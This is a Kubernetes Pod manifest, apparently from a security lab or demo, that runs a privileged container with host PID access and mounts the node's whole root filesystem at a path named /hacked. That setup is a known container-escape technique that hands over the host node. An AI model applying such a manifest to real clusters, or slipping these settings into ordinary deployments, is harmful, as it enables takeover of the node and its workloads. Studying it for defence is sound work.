apiVersion: v1
kind: Pod
metadata:
  name: playground
spec:
  hostPID: true
  containers:
  - name: playground
    image: abigillu/playground:v1.1.0
    securityContext:
      privileged: true    
    command: [ "/bin/bash", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
    volumeMounts:
    - name: host
      mountPath: /hacked

  volumes:
  - name: host
    hostPath:
      path: /
